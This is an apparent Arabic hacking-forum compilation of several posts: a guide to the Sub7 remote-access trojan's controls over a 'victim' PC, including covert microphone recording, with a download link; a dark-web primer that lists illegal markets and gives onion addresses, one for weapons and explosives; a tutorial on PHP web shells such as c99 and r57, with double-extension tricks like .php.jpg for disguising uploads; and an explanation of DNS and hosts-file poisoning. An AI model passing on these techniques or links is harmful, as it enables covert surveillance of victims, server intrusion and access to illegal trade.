يمكنك هنا من العمل على فتح صفحة فى الأنترنت على جهاز الضحية و هى بسيط الأستخدام فعن طريق كتابة عنوان الموقع فى الخانة (2) و الضغط على رقم 3 ليقوم بفتح الموقع عند الضحية


يمكنك هنا من تغير الوان الشاشة لدى الضحية عن طريق

1- تغير لون القوائم

2- لتحديد لون اشرطة المهام والأزرار

3- لتحديد لون خلفية النوافز

4- للعمل على تنفيذ الألوان التى انت قمت باختيارها لدى الضحية

5- للعمل على اعادة الألوان لدى الضحية الى طبيعتها

هذه هى اخر قائمة سوف نقوم بالتعامل معها و ننهى شرحنا للبرنامج نوضحها كما يلى



1- للعمل على الحكم فى قفل و فتح الجهاز عن طريق عمل اعادة تشغيل او اطفاء الجهاز او…….

2- التحكم فى الموس عن طريق شاشة سوف تظهر على اليمين سوف نوضحها بعد قليل

3- التحكم فى مستوى الصوت لدى الضحية

4- اذا كان لدى الضحية mic او مايكروفون يمكنك من تسجيل ما يدور حوله دون ان يشعر انك تقوم بذلك ثم تسمع ما دار فى ذلك

5- التحكم فى اعدادت الوقت و التاريخ لدى الضحية

6- و هى خصائص للمتعة اخرى و هى تتكون من اظهار الأيقونات على سطح المكتب و اخفائها اخفائ قائمة ابدأ (start) و اظهارها فتح السىدى و اغلاقه اخفاء الساعة و اظهارها اظهار التحكم فى الصوت واخفائه اطفاء الشاشة و فتحها

7- التحكم فى لوحة المفاتيح بطريقة اخرى عن طريق التحكم فى الأزرار الثلاثة caps lock و num lock و scroll lock و العمل على منع استخدام ctr\alt\del و اعادة استخدامها

8- للعمل على عكس ازرار الموس

9- ارجاعها كما كانت

10- اخفاء الموس

11- اظهارالموس

12- التحكم فى الموس

13- الغاء التحكم فى الموس

14- لأظهار زيل للموس

15- لألغاء الزيل

16- التحكم فى طزل الزيل
لتحميل
http://www.mediafire.com/download/on.../Sub7+.2.2.zip

لقد تعبت في تجميع الصور وفي كتابة الموضوع

وهدا الموضوع مهدا لكل عضو وضع رد في موضوع من مواضيعي

+تقييمك يشجعني

7 ساعات وانا بنسق في المواضيع

طريقك الى النت المخفي DeepWeb

$
0
0
السلام عليكم ورحمة الله

بسم الله الرحمن الرحيم

طريقك الى النت المخفي (النت العميق) DeepWeb


ما هو النت المخفي ؟

يمكن تسميته بالجزء المظلم من الشبكة العنكبوتية فهو يضم ملايين المواقع/الخدمات التي لا يتم ارشفتها في محركات البحث والتي يصعب العثور عليها كما لا يمكن الوصول اليه بالطرق العادية كالمتفح IE,Firefox...


ماهي شبكات النت المخفي ؟

توجد مجموعة من الشبكات التي تندرج فيما يسمى بالنت المخفي, فكل واحدة منها تشتغل عن طريق برنامج معين
من بين هذه الشبكات :
شبكة Tor (الأكثر استعمالا)
شبكة I2p
شبكة Freenet
شبكة Anon2

لماذا النت المخفي ؟

الديب ويب هو عالم لا يخضع لأي رقابة و ذلك لتعذر السلطات من تعقبه وتعقب مستعمليه, فتعقب مواقع الديب ويب ومستعمليه يمكن أن يكون مستحيلا اذا تم استخدامه بالطريقة الصحيحة.


ما الذي يمكنني أن أجده في النت المخفي ؟

كونه غير خاضع لأي رقابة, فهو يستعمل كسوق سوداء ومكان لتبادل كل المعلومات الممنوعة والتي يعاقب عليها القانون

من بين هذه الأمور:

المواقع الاباحية للاطفال القاصرين
مواقع تعليم صناعة واستخدام الأسلحة والمتفجرات و تقنيات الحرب
تعليم صناعة الأسلحة البيولوجية
مواقع الجهاد
مواقع تعليم الاختراق, البرمجيات الممنوعة, بيع الثغرات والبوتات
مواقع بيع وشراء المخدرات
مواقع بيع خدمة الاغتيال
مواقع التزوير
مواقع لتسريب المعلومات
الكتب والفيديوهات الممنوعة
مواقع الصور الفاضحة الخطيرة
مواقع تواصل اجتماعي
...

مستويات الديب ويب :

حسب بعض المواقع والله أعلم, الديب ويب يحتوي على 5 مستويات, كل مستوى يختلف في طريقة الوصول اليه, ويختلف في أهمية المعلومات التي يحتويها.
صورة توضيحية :


أنواع المواقع والنطاقات في الديب ويب :

يوجد الملايين من مواقع الديب ويب والتي يصعب العثور عليها وهي تكون بنطاقات غير مألوفة وبروتوكولات أخرى غير التي نعرفها.


من بين نطاقات الديب ويب مثلا

bit.
onion.
i2p.

نوع من أنواع المواقع التي نجدها في شبكة Tor
http://eqt5g4fuenphqinx.onion


نوع من أنواع المواقع التي نجدها في شبكة Freenet
http://127.0.0.1:8888/freenet:USK@2L...GQNNcwUhsrW5vJ 8VtlmNX5ka2~dlU,AQACAAE/AFKindex/170/


نوع من أنواع المواقع التي نجدها في شبكة I2p
http://perv.i2p

الخدمات المخفية :

يحتوي طور حلى ميزة "الخدمات المخفية" والتي احد الان لم أستطع ايجاد أي واحد منها, لذا يبقى الأمر مجهول... أظن أنها عبارة عن خدمات أو مواقع سرية يتم الوصول اليها بطرق أخرى

أي شبكة أختار لأبدأ طريقي في النت الخفي ؟

Tor حقيقة هو البرنامج الأكثر استخداما وذلك لأنه يضم شبكة ضخمة, بالاضافة الى بساطة استعماله

هل يجب أن أقلق عند دخولي للنت الخفي ؟

في الحقيقة هذا يعتمد على طريقة استخدامك وفي ماذا تستخدم الديب ويب.
ففي اخر حادثة, اخترقت مجموعة مجهولة ترفض ايباحية الأطفال استضافة "فريدوم هوستين" رغمة سيرفراتها المؤمنة وقدمت معلومات لل FBI عن أصحاب هذه المواقع


ما الأفعال التي يجب تجنبها ؟

الديب ويب حقا ليس مكان لربط صداقات أو للشهرة
لهذا يجب:
تجنب اعطاء أي نوع من المعلومات الشخصية
يجب تجنب استخدام الأسماء التي تستخدمها في النت العادي الذي نعرفه.
لا تستخدم بريدك الالكتروني الخاص في الديب ويب
لا تفتح أبدا أي ملف قمت بتحميله من الديب ويب في جهاز متصل بالنت, يفضل استخدام جهاز وهمي مفصول عن الشبكة

--------

شرح الدخول للنت الخفي Tor

أولا التحميل من الموقع الأصلي

https://www.torproject.org
نقوم بالثتبيت ثم نفتح البرنامج

بعد فتح البرنامج ننتظر حتى يتم الاتصال

سيفتح تلقائيا المتصفح وستظهر هذه الصفحة تخبرك ان كنت تستعمل طور أم لا, كما أنها تخبرك في حال وجود تحديث للبرنامج


الان يمكنك فتح مواقع الديب ويب, هذه أمثلة قليلة

موقع هكر http://clsvtzwzdgzkjda7.onion
Tormail http://jhiwjjlqpyawmpjx.onion
دليل مواقع http://dppmfxaacucguzpc.onion
استضافة مجانية (تحتاج الى دعوة) http://xqz3u5drneuzhaeo.onion
http://ci3hn2uzjw2wby3z.onion
أسلحة, متفجرات http://p2uekn2yfvlvpzbu.onion
كتب منوعة http://xsin4xbme24aatvk.onion
موقع عربي غريب http://aub35xzuj7wslusm.onion


تــــم والحمد لله


في النهاية, لقد وضعت هذا الموضوع للفائدة والعلم فقط, لأني رأيت أن القليل جدا من يعرف الديب ويب.
كما أني بريء من الاستعمال السيء الذي لا يرضي الله.


يسمح بنقل الموضوع دون ذكر المصدر

الســلام عليــكم

جميع أدوات القرصنة والاختراق بحجم 1.46 gb

اضخم شرح للشل لا تستفسر بعد اليوم كل شي واكثر+شرح موسع+

$
0
0
بسم الله الرحمن الرحيم



كثرت استفسارات المبتدين عن الشل
--
اخي ممكن شل برابط صوره
ممكن رابط شل
.txt
ممكن اعرف شو الشل...
------
كل هذا واكثر رح تعرفه الان
-------------------------------
في البدايه انا لا استهزء بكم
فهكذا كل المبتدئين حتى انا اضفت واحد بفهم كتير بالهكر
عشان اقله شو الشل
فقام عملي بلك فورا :sossa:
----------------------
ملاحظه هامه جدا
الدرس دسم شوي لانو موضوع الشل
بشكل العمود الفقري للهكر
يعني صعب شرحه بدون لا نتطرق للعديد من الكلمات
ولذا شرحت كل لكمه صغيره او كبيره
وفي حال مريت على كلمه دون شرح ارجو تنبهي ولك الشرح كما تريد


:a06:



بسم الله نبدا
ما هو الشل
الشل هو عباره عن ملف
مكتوب بلغه PHP
وهو ينصنف على انه اكواد خبيثه
وتزرع في اختراق المواقع
وتحتوي الشلات على برمجات واكواد خبيثه
تصل حتى الان الي 10 اكواد او اكثر
ووظيفه هذه الاكواد هي المساعده في تنفيذ الاوامر على السيرفر
---

حتى نفهم الموضوع اكثر بنيجي لتعريف السيرفر
ما هو السيرفر
السيرفر هو عباره عن جهاز
يشبه جهازك الخاص لا فرق كبير
لكن يعمل بتقنيه الخادم والزبون
اي انه يقوم بتلقي الطلبات من غيره من الحواسيب
ويتميز بسرعته العاليه وهو موصول على خط سريع جدا
تصل الى
100 ميجا واكثر


يمكنك ببساطه تحميل سيرفر اباتشي
2.2
على جهازك الشخصي
وهكذا يكون عندك سيرفر من نوع اباتشي
او سيرفر وندز
وهذا السيرفر موجود على سي دي الوندز XP
والخدمات العنكبوتيه الي توصلك كلها من السيرفرات
خذ مثال
-----
مثال على تقنيه الخادم والزبون
مثلا انت بدك تتصفح موقع
vbspiders.com
طيب اخي هذا موقع الشبكه العنكبوتيه
موجود على سيرفر
اذن انت اعرفت مين الخادم
الخادم هو السيرفر
والزبون هو انت
الان انت كتبت في المتصفح الموقع
يتم تحويل الطلب الى السيرفر
باستخدام جداول توجيه الشبكات (عباره عن جداول بسيطه تحدد مكان السيرفر)
يكون السيرفر ينتطر الطلبات (وظيفته)
وعندما يصله طلبك يتاكد من توافره
ويرسله لك
ويظهر عندك بالمنتصفح


والسيرفرات قد تكون بحجم جهازك
وقد تكون مخصص لها مبنى كامل
خاصه في شركات الاستضافه







-------------
قبل لا نرجع لمفهوم الشل بندنا نحكي عن اشي اسمه سكربت
هذه الكلمه رح تزهقها من كتر ما رح تسمعها
ما هو السكربت
هو عباره عن مجموعه من الملفات وقد تكون ملف واحد
تثبت على السيرفر
وهي ملفات الموقع
مثلا منتدى
vbspiders
هو عباره عن سكربت vb
يحتوي العديد من الملفات
واخطرها الملفات الموجوده بمجلد
incloud
مثل ملف
confing
الموجود فيه بيانات سريه بالمنتدى مثل
باسويرد وهيك اشي
ما بدي ازي د بلاش تتعقد
-------


الان نرجع للشل
بدي نعرفه من جديد
ليه هو التعريف السابق خطا
تقريبا هيك اشي التعريف السابق لمحه سريعه
-----
الشل
هو عبارة عن سكربت مكتوب بلغة phpshell ويعمل الشل كوسيط بينك وبين والسيرفر
ويمكنك من خلاله تنفيذ اوامر تمكنك من السيطره التامه على السيرفر
--
استخدامه
ان الهكر هم اكثر من يستخدمه
لكنهم ليسو الوحيدين مطقا
فهناك من يستخدمه لامور قريبه من الهكر
يسمونه هكر سلمي او هيك اشي
--


طيب بدنا نعرف عن الشلات اكثر


كيف نتعامل مع الشلات
اغلب الشلات تتعامل معها من خلال اوامر ليونكس



شو ليونكس هاد انا بلشت اتعقد كل خطوه الف مصطلح
:a41:
---


بكل بساطه ليونكس
هو عباره عن نظام مطور عن الونذز العادي يعني اشبه بالوندز
زي مثلا XP
انصحك تتعلم هذا النظام ووتعامل معه لانو بساعدك كتير
بالهكر
وذلك لانه يدعم لغات البرمجه وادواتها
مثل اداه
النت كات (شرحها سيكون في موضوع اخر)


سؤال
احنا شو دخلنا بالبرمجه
اشرب قهوه حبيبي
صحصح
احنا قاعدين هون بنبش ورا المبرمجين الي هم يكتبو السكربت
ولما يغلطو غلطهه صغيره
بنجرجرهم من ايديهم
وبنخترق سكربتاتهم :666:
-------
طيب فهمنا اخي
بعدنا ما بدنا نعرف عن الشلات اكثر
؟؟؟؟
ايه ما خلصنا
بدنا نعرف انواع الشلات
--
اجل هناك انواع كثيره من الشلات
شوف اخي



هذه انواع الشلات ولمحه سريعه عنها
بصراحه ليست موجوده الشلات كلها اعندي لذا ان شاء الله اشوف حد يجبلي اياهم وانا اجيبلكم الرابط
لاحقا


1- webadmin هذا الشل جيل ومفيد للمبتدئين لأنه يسمحلك برفع الملفات وحذف الملفات وإنشاء مجلد بكل سهولة ولتطبيق أمر معين مثلا


على ملف كل ما عليك هو انك تضغط على المكان الفارغ أمام الملف المراد التعديل عليه واختار اللي تبي تعديل حذف او غيره كذلك تستطيع


حذف مجلد كامل فهو لا يحتاج إلى أوامر لينكس.



2- MyShell هذا الشل جميل ولكن قديم وهو يعتمد على أوامر لينكس ويمكنك معرفة صلاحياتك بجانب الجملة Current User ومعرفة كل المجلدات الذي في المجلد الذي تتصفحه




3- phpRemoteView شل جميل ومشابه لخصائص الشل webadmin وكل مجلد تود التعديل عليه استخدم الأسهم المقابلة لها ولكن هذا الشل فيه ميزة جميلة وهي انك تقدر تفك تشفير الــ md5 الخاصة بالمنتديات.



4- phpshell-1.7 شل جميل وشبيه بالشل MyShell مفيد للمبتدئين




5- phpFileManager شل سهل جدا وأوامره واضحة ولا يحتاج إلى شرح





6- r57shell الشل الروسي الغني عن التعريف الذي أنا أفضله من بين كل هذه الشلات وهو يحتاج إلى أوامر لينكس ولكن فيه أوامر البحث عن
ملفات الكونفج (اعتقد اني ذكرتها سابقا)
وأوامر سحب الملفات اي الدوال لسحب الملفات جاهزة كلها وفيه ميزة تحميل ملفات من جهازك إلى الموقع المخترق من خلاله


فقد أضيفت له ثغرات وشغلات جميلة اكتشفها بنفسك (سيتم شرحه باذن الله بالتفصيل اللمل)




7- phplab شل جميل ولكنه غير عملي ولا انصح المبتدئين به



8- haexplorer شل أيضا جميل ولكن غير عملي ولا انصح المبتدئين باستخدامه



9- php exploit lab شل أيضا جميل ولكن أيضا لا انصح المبتدئين به



10- C99 شل جميل ورائع وفيه مميزات جميلة وهي إنك تقدر تخترق قاعدة البيانات من خلاله عن طريق الاختيار sql وهذا الشل يسمحلك
بتطبيق أوامر لينكس ... بالإضافة إلى إمكانية تصفح الملفات من خلاله كما في الشل webadmin ولكن باختيارات أوسع ...


&&&
ذكرنا كلمه جديده
SQL
ما هي اس كيو ال
او بالعربي
لو لغه الاستعلام البينونه


هي عباره عن لغه برمجيه تعتمد عليها قواعد البيانات
بحيث يكون هناك ملف ترتب من خلاله باقي الملفات الاخرى
ويحتوي على اهم المعلومات السريه ايضا


لم افهم


انا ابسطها اعمل حالك فاهم بلاش تتعقد لانو الدرس دسم
هذه اللغه وجدت لهدف وهو ترتيب الملفات
يعني عندك شركه
فيها 21 مليون الف دفتر
بدك اتطول منها معلومه
اكم سنه وانت تنبش بين الكتب تا توصل للمعلومه
حتقلي مليون سنه ضوئيه
اقلك اه لو كنت انت فوضوي
بس لو رتبتها بشكل مناسب حسب شغلك
فيك توصل للمعلومه باقل من نص دقيقه


لكن لو بدك تعمل تقرير معين
قول مثلا بدك تعمل تقرير لمصاريف هذه السنه
والمشاكل وتحللها
هسا بدك مليون سنه ضوئيه
طيب شو الحل


الحل هو ادخال عالم الحواسيب الى عالم المكاتب
يعني بالعربي
حط ملفات الشركه على الكمبيوتر (خخخ هسا بتحطهم على ظهر الجهاز :37


طيب حطينا الملفات
بدنا نرتبها زي ما نرتبها على ارض الواقع
عندك بتتدخل هون لغه الاستعلام البينونهSQL
والي هي هدفها ترتيب ملفاتك وتسهل التعامل معها وتطويرها وتنسيقها
والادخال اليها واكثر مثل ادخال عمود او جدول
بلاش اعقدك اكتر موضوعنا عن الشلات






روح اشرب كاسه نسكفيه
وارجع عيد موضوع dz-الشبح
من عند SQL





والآن الحمد لله الكل عرف الشل وأنواعه واستخدامه
والشل درس دسم وذلك لانه العمود الفقري بالهكر
وبنتطرق لمصطلحات كثيره وبتجيب العقدات
خخخخ





انا اقلكم اتعاملو مع الشلات الروسيه لانها الاكثر والافضل وتقودك لعالم الاحتراف
وهي


c99
او
r57
او الشل المطور
شل سنايبر
تطوير للشل
r57
والله اعلم


كيف تغير امتداد الشل وتحصل
على شل بدون عياط للمحترفين


عندك موقع اسمه جوجل
لو انزلت عليه واعملت بحث متقدم
في عنوان الصفحه
وكتبت
c99.txt
رح يطلع معاك اقل اشي شل مكتوب بلغه PHP
ولهذا انت بتقدر تحصل عليه


واذا بتحب ايضا
انسخ الكود كامل لصفحه الملف C99
وافتح مفكره وحطه فيها
--
نقطه هامه
اعمل SaVe As
وبعديها
اتنبه هام
شايف المكان الي بدك تكتب فيه اسم الملف
تحته بالضبط
في مكان مكتوب فيه
Text D0cument (*.txt)
استبدلها بكلمه
All file


الان اكتب اسم الملف مثلا
dz-الشبح

اسم الشل
هذه بعض الامثله


الشل بامتداده الحقيقي
php
c99.php


شل بامتداد صوره
c99.php.jpg


شل بامتداد ملف مضغوط
c99.php.zip


شل بمتداد اغنيه
c99.php.ram
or
c99.php.mp3



الخ
المهم افهمت الفكره



طيب اعرفنا الشل
بس ممكن نشوفه
اكيد
هذه صوره للشل :redface:
c99
وهذه صوره لشل
r57

;)

dns attack خلفية متقدمة+تصحيح مفاهيم+باب حول

$
0
0
السلام عليكم ورحمة الله وبركاته
تحية لجميع افراد واعضاء جيوش الهكر
is small note:قد يكون اسم الموضوع متناقض مع محتواه لانني فتحت الباب على كثير من الاشياء
اذا كان لكم رائي اخر حول اسم الموضوع :بانتضاركم.. :)
((introduction))
هذ الموضوع البسيط الذي كتبته هنا يستهدف ذوي الاساسيات وبالامكان الخبراء ايضا الاطلاع على ما هو موجود في هذه الورقات البسيطة
للنقاش وتزويدنا بمعلومات اكبر وهذا ما اتوقعه..ساتناول به بعض الهجومات التي يتعرض لها dns server وبعض التفاصيل الاخرى .الخ ...
مرفقة بصور توضيحية وكلام مبني على اساس علمي صحيح نضريا وتطبيقيا والفائدة الاكبر بالمعلومات الجديدة التي فيه التي اعتقد انها لم تطرح على الاكثر في
المنتديات العربية الاخرى ليس لانها اول مرة تطرح هكذا مواضيع بل العكس انها اشتهرت بين الكثيرين ولكن البعض يوافقني بانها كلها مواضيع ومقالات
مقتبسة واساسها ضعيف جدا :- هذا ما لاحضته. وستتضح لكم الفكرة عن ماذا اتكلم في الموضوع.
للمعرفة اكثر لمن لا يملكون معلومات عن هذا المجال:-واخذ فكرة عن هذ المقال:-
ارجو مراجعة الدرس السابق الذي كتبته في دورة دليل المبتدى الى الاساسيات والذي تكلمت فيه عن
DNS system and servers :-
الرابط.## في الدورة نفسها ..
او باالامكان مراجعة Domain Name System - Wikipedia, the free encyclopedia .
---------------------------------------------
any way
بعد المقدمة البسيطة ..احب ان ابدء في كتابة اكثر الاشياء اهمية في خصوص DNS والامور المتعلقة به.
هذا المقال او الموضوع سموه ما شئتم O_o

ساتكلم فيه عن هجوم تسميم وتلويث سجل النطاقات وما يواجهها من ip special الموجودة في الخوادم server dns-1
وهجوم تضليل المستخدم عن طريق التلاعب بسجل hosts file -2 الموجودة بالجهاز الشخصي
وايضا ساذكر موضوع السجلات المؤقتة المسممة(Cache Poisoning)او ما يسمى تسمم/تلوث السجلات المؤقتة
but before
(مشكلة)متصلة) ^ان الاخوان الي في المحتوىالعربي يشرحونها بشكل غير صحيح ويذكرون بان جميع طرق هذا الهجوم
او كل ما يذكر من تسمم او تلوث ينسبوها الى cache poisoning :وهذا شي خاطى وليس له اي اساس من الصحة
والسبب عدم لديهم المعرفة الكافية في هذا المجال او نقلا من مصادر موثوقة حسب اعتقادهم
---دعوني اوضح اكثر .
ان الفرق (مثلا) هو ان التسميم الاول يحصل في server dns ويقودنا الى server dns poisoning
والتسميم الثاني حصل في ملف الخوادم hosts file ويقودنا الى hosts file poisoning
وهنا نستنتج اننا الى الان ليست لدينا علاقة بما يسمى ب cache poisoning .اي الذاكرة الوسيطة المسممة.
لان بالاساس الذاكرة الوسيطة تتواجد في خوادم dns المحلية التي يزودها عادة مشغلي الشبكة ومزودو خدمة الانترنيت
(cache ISPs/local).
والضعف الامني الذي يحصل من وراء هذه التهديدات هي بسبب خادمات ضعيفة :-
-خادمات DNSالتي تعالج المعلومات الاضافية
-خادمات DNS التي تعالج الطلبات التكرارية.
و cache poisoning هي هذه الذاكرة لكن مسممة\ملوثة :-
والذاكرة الوسيطة هي التي يتم تخزين فيها السجلات المؤقتة .(فكرتها) ان اي اتصال بموقع ودومين معين راح يتخزن في
هذه السجلات وذلك لتخفيف الضغط على Server Dns المسئول عن النطاق الذي يتم الاستعلام عليه بعد فتره قصيرة من الاستعلام الاول
وتخفيف الضغط على سيرفرات مزود الخدمة الخ من تسريع عملية التصفح مثلا او لتقليل "الكلفة ماديا"الناتجة من بعض الامور...
.حيث ان فكرة هذه السجلات هي تخزين النطاقات وما تواجهها من ip address special.
---------
وصلنا الى النقطة الوسيطة وهي اننا تلاعبنا بسجلات dns او لوثنا NS/A/etc لكنا لم نصل الى cache
وسممنا ملف الخوادم hosts file لكننا لم نصل الى cache
وقفة تحليلية:البعض قد يفكر بان هذه الطريقة لا تاتي من ضمن "Dns attack" وانها تتفرع من هجومات dns spoofing
هذا الكلام صحيح ؟؟؟؟ .لكن بالاساس هذا الملف اسمه ملف الخوادم يعني مثل ما نحن قمنا بتسميم "ملف المصدر"الموجود بال dns
هنا ايضا قمنا بتسميم "ملف الخوادم"الموجود بجهازنا الذي بامكاننا ان نقول انه اصبح "ملف المصدر" بعد التعديل عليه
لان الاستفسار الذي سيقوم به المستخدم سيذهب اولا الى هذا الملف في حال تسميمه او تم التلاعب به
.هذا سيبقينا داخل دائرة "dns attack" لكن ايضا لا ننسى العلاقة الوطيدة بين
(dns spoofing/dns attack/etc) كونها هجومات تعتمد بالدرجة الاولى على تضليل المستخدم
المهم نرجع من جديد:- الى اننا الى الان لم نصل الى المعنى الحقيقي ل cache poisoning من ناحية الهجومين .
وكل هذا يرجع الا اننا لم نسمم السجلات المؤقتة
بل لوثنا السجلات (المتبعة(اساسيا) للرد على اي استفسار يقدم لها من قبل المقرر .
وبعد (نجاح الهجوم التعديل\التلاعب)بالامكان ان نطلق عليها cache poisoning وهذا في طلب الاستعلام الثاني
وقتها افترضنا ان التسميم حصل وهذا يقودنا الى cache poisoning الوسيطة بيني وبين الخوادم..
وايضا يبقى الاساس متلاعب به ومسمم
---
النقطة الاخيرة:-تبين لنا ان هناك فرقا كبير بين Cache poisning attack-1 وبين Dns poisoning attack-2 :-
حيث الهجوم (1) يعتمد على تسميم السجلات المؤقتة والمحفوظة in cache Dns المقدمة من خوادم dns المحلية ..الخ.
صورة توضيحية :-

كود:

www.zo-dns = 3.3.3.3 || www.xxx.net+www.zo-dns.net=3.3.3.3

هنا قصدت استهدافها بعملية الاضافة ..الخ....
موضوع "cache poisoning" موضوع طويل جدا ولهذا انا لم اتطرق اليه كثيرا
ساخصص له موضوع كامل وسافصل الاشياء المعقدة فيه .باقرب وقت ممكن.
والهجوم (2) يعتمد بتعديل على السجلات الاساسية المحفوظة in source records .
صورة توضيحية :-



كود:

zo-dns.net. NS NS1.nsz-d.net
zo-dns.net. NS NS2.nsz-d.net

NS1.nsz-d.net. A 3.3.3.3
NS2.nsz-d.net. A 3.3.3.3

وهذا الهجوم يسمى ايضا بالضربة المباشرة .اي التلاعب بالمصدر نفسه بعيدا عن تسميم الكاش .وتطبيقه صعب جدا جدا..
هذا مجرد مثال لتصحيح المفاهيم التي يستوعبها اخواني العرب بشكل خاطى وتبقى معلقة في اروقة عقولهم

وفي كتاباتهم للمواضيع اكيد بعد نسخ\لصق تمتد الى ابعد من ذلك حيث تشمل المبتدئين وكل من هو جديد عن هذا التخصص
المهم هذا الموضوع متشعب وانا ساذكر الكثير من النقاط التي احب ان اتوقف عندها لاوضح اكثر.
فارجو الانتباه وانا معتبر ان الي متابعني فاهمين الوضع ..
----------------------------------
حسنا يا جماعة دعونا ناخذ فكرة عن هذا الاسلوب من الهجوم:-
يمكننا من افساد هذه السجلات المهمة حيث تكون المعلومات المخزنة الصحيحة في هذه السجلات
هي عرضة للتغيير وافسادها بعدة طرق(بعدة طرق)مثلا:-
1-hosts-l A +etc
.dns poisoning- A +etc -2
.cache poisoning- A +etc -3
.......attacks other
>خيار اول:- هي وجود ضعف امني في نظام dns وخوادمه او برامجه الاساسية مثل bind .تتبع(servers ISPs)
//وهذه صعبة(حاليا) لكن ليست مستحيلة(حاليا) :
//حيث ان نظام dns وموزعو الخدمة وخوادمه حاله حال اي خادم اخر لكنها مؤمنة اكثر وهذه ترجع الى عدة امور كثيرة
//ومن الصعوبة الحصول على باب للدخول لكن نحن نعرف شي اول"لم تخلق الحماية الا لتخترق"
//ونعرف شي ثاني"ليس هناك نظام\برنامج\اي شي خالي من الثغرات او بنية مؤمنة من جميع النواحي"
//وهذه كلها تتبع ان ليس هناك شي كامل فالكمال لله سبحانه وتعالى.
//حتى هذا الموضوع فيه اخطاء .لاننا لسنا معصومين من الاخطاء.
//هذه كلها فكرة اولى(بالامكان مراجعة كتاب (نظام اسماء النطاقات:مخاطر وحلول: احد المراجع الجيدة حول هذا الموضوع).
>خيار ثاني>باب اخر>عمليات spoofing الخ .....
>خيار ثالث>باب اخر>الاختراق المستهدف .....
>اخرى......
جميع الطرق تعتمد اسلوب the client misguidance..القصد بتوهيم او تضليل الزبون
مثلا هي توجيه الزبون\المستخدم الى موقع اخر غير مرغوب به وهذا كله يتوقف على طريقة الاستغلال التي قام بها المهاجم
خلونا نوضح طريقة الفكرة اكثر :- ولنفترض :-باختصار:-
عملية اعتيادية---->client يستفسر عن domain معين >الى dns server local وقتها > lookup on Dns Cache <لا شي
يتوجه السوال الان الى خادم master server بارسال الاستفسار الى الخادم الذي يوجد لديه البيانات
حول هذا الدومين < هذه كلها بعد عملية a.root/b.c.etc .ثم تتم عملية الرد المعروفة.
صورة تبين الطلب.بدون تسميم=نتيجة صحيحة وموثوقة:-


الى الان بدون تسميم :-
عملية التسمم\التلاعب----->-بعد ما تم التاكد من عدم وجود معلومات عن النطاق المطلوب في cache وبعد ما تم ارسال الاستعلام الذي اعطيناه
الى local dns الى خوادم اسماء النطاقات .وقتها راح يرد الخادم المسمم بالمعلومات الصحيحة+معلومات غير صحيحة.
//to explain > معلومات صحيحة هي المعلومات التي يرسلها الخادم لنا عندما نستفسر عن اي موقع .
//والمعلومات الغير صحيحة هي التي اضافها attacker الى المعلومات الصحيحة.بعد اقناع الخادم الرئيسي .
//وقفة تحليلية:- القصد هنا بالاقناع هو عمليات الاقناع التي تستهدف cache local والتي تسمى بهجومات cache poisoning
ولا يتدرج تحته هجومات dns poisoning لاننا في هذا الهجوم نستهدف المصدر نفسه يعني اختراق بحت ...
وهذا الاقناع يكون بعدة طرق منها السهلة التي اكتشفها Dan ومنها الصعبة التي فتح الباب عنها Dan والتي هي قيد التطوير ؟؟ الخ.
وان شاء الله اذا توفقت ساكتب مواضيع تتحدث عن التحايل والاقناع(بعدة طرق):.
الان فهمنا ان المعلومات الغير صحيحة اضافها المهاجم
صورة تبين الطلب+التسميم الذي حصل:-


يتبع---->-وقتها راح تصل لنا معلومات من dns local عن موقع اخر.وهي لتضليلنا عن استخدام الموقع المطلوب..<<تعتمد على طريقة الاستغلال.
.بعدها اكيد ان dns local راح يخزن المعلومات التي استقبلها من الخادم في السجلات المؤقتة وهنا اي شخص (محلي)< تابع لمزود الخدمة مثلا
سيقوم بارسال query الى dns local راح تستجيب لهcache المسممة وترد عليه بالمعلومات التي تم تحزينها من قبله.
see the picture to explain more


هنا ياتي دور cache poisoning وتبدا مهمتها بعد ما اصبحت مسممة\ملوثة بعمل المطلوب منها < وهي عمليات التضليل الخ...
دعونا نتعمق اكثر فاكثر :-
كل ما ذكر فوق تم في حالة وهي ان لا يوجد معلومات عن هذا النطاق في جداول الخادم او dns caching :-
فاذا وجدت هذه data in cache لن تنجح جميع طرق الهجوم التي تسمى ب cache poisoning الخ..الا بطرق اخرى:-
وقفة تحليلة لطريقة من هذه الطرق:example about this attack
//وهي ان يقوم المهاجم بالتعديل على سجل ملف الخوادم الموجودة في الجهاز نفسه(Hosts File)
كود:

//as in windows :X\win\sys32\drivers\etc\hosts
//unix-like /etc/hosts

//وتعديل البيانات الى ما يريده المهاجم .اذا اراد تحويل,حجب,الخ اي موقع يطلب من الضحية
// for example to Zo-Dns .
//او هجومات arp poisoning -spoofing كثيرة ومتعددة .
//طيب يا احمد ممكن توضح اكثر
//دعونا ناخذ مثالنا التالي عن نظام ويندوز :ارفقت فديو"just"لتوضيح هذه العملية.ولاثراء المحتوى اكثر.
الرابط::::::::اعذروني .ما في مركز تحميب شريف ..اليوم مساء اعدل عليه
--------------------------->> back to the subject
//وهنا لن تقدر ان تفعل شي ولن تعرف ما المشكلة لان المشكلة اصبحت تقبع في الهوست والسجلات الموجودة والمسئولة عن الاجهزة في الشبكة التي تتواجد بها .
//حيث سيتم تحويلك الى الموقع Zo-Dns كل ما حاولت ان تستعرض موقع اخر مثل www.dnssec.net .
//والحل اكيد بتحليل "hosts file" وتصحيحه و مسح السجلات بالكامل وتنضيف الذاكرة.
كود:

Flush DNS in Windows
`use the command `ipconfig /flushdns

..
//اذا لم تحل ايضا بالامكان تجريب الامرين
كود:

net stop dnscache :ايقاف الخدمة

كود:

net start dnscache :بدا الخدمة من جديد.

كود:

Flush DNS in Linux
`use the command `/etc/init.d/nscd restart

.
//ايضا من بابا اخر لن تفيدنا عملية `TTL` والوقت المحدد من قبل الخادم المسئول.الخ....
//لان المشكلة مثل ما قلنا locally .
//بالامكان تطوير هذه الفكرة لتؤدي الى تسميم الشبكة كلها؟؟!!او الوصول لصلاحيات اعلى تمكننا من تسميم الكاش نفسها !
او مثلا ارسال باتش يستهدف هذا الملف ويعدل فيه .او اختراق مستهدف=حسابات بنكية.الخ....من عشرات الطرق.

اذا:-الصور السابقة والفديو توضح لنا طرق الاستغلال لهذه المشكلة ..
حيث توضح لنا ان المعلومات الصحيحة تم ارسالها بشكل صحيح من الخادم المسئول ..
but+information wrong اضافها attacker الى المعلومات الصحيحة.او تم ((التلاعب بها اساسيا من المصدر الموثوق)).
طيب دعوني اوضح اكثر .. ..ان الموقع المطلوب الذي قمنا بالاستعلام عنه لم نتمكن من استعراضه بل
استعرضنا موقع اخر او بشكل متقدم صفحة اخرى...لاحظ الصورة:-

